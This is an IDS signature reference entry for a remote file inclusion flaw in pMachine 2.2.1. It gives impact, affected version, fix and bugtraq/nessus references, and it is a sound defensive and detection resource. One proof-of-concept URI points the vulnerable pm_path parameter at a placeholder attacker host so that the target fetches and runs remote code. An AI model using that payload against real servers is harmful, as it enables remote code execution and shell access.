GEN:SID | 1:2226 |
Message | WEB-PHP pmachine remote file include attempt |
Summary | This event is generated when an attempt is made to exploit a known vulnerability in the PHP application pmachine.
|
Impact | Execution of arbitrary code possibly leading to a remote shell.
|
Detailed Information | Versions of PMachine do not properly check included files and it is possible for an attacker to include a file of their choosing which may lead to arbitrary code execution on the target host.
|
Affected Systems | PMachine PMachine 2.2.1
|
Attack Scenarios | The attacker can include a file of their choosing by appending the file URI to the end of a URI for the application.
Proof of concept URI by FrogMan:
http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt
|
Ease of Attack | Simple. No exploit software required.
|
Corrective Action | Upgrade to the latest non-affected version of the software.
|
Additional References | |
Rule References | bugtraq: 7919
nessus: 11739
|